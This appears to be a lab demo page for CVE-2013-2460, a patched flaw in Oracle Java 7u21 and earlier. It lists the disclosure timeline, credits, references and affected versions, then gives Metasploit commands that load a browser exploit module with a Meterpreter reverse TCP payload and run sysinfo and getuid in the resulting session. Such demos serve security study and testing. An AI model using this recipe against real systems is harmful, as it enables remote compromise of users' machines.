CVE-2013-2460 Java Applet ProviderSkeleton Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Adam Gowdiak the 2013-04-22 (Issue 61)
Vulnerability corrected by vendor the 2013-06-18
Metasploit PoC provided the 2013-06-24
PoC provided by Adam Gowdiak the 2013-07-18

PoC provided by :

Adam Gowdiak
Matthias Kaiser

Reference(s) :

CVE-2013-2460
OSVDB-94346
SE-2012-01-ORACLE-12
Oracle Java SE Critical Patch Update Advisory – June 2013

Affected version(s) :

Oracle Java SE 7 Update 21 and before

Tested on Windows XP Pro SP3 with :

Java SE 7 Update 17

Description :

This module abuses the insecure invoke() method of the ProviderSkeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier.

Commands :

use exploit/multi/browser/java_jre17_provider_skeleton
set RHOST 192.168.0.20
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.20
exploit

sysinfo
getuid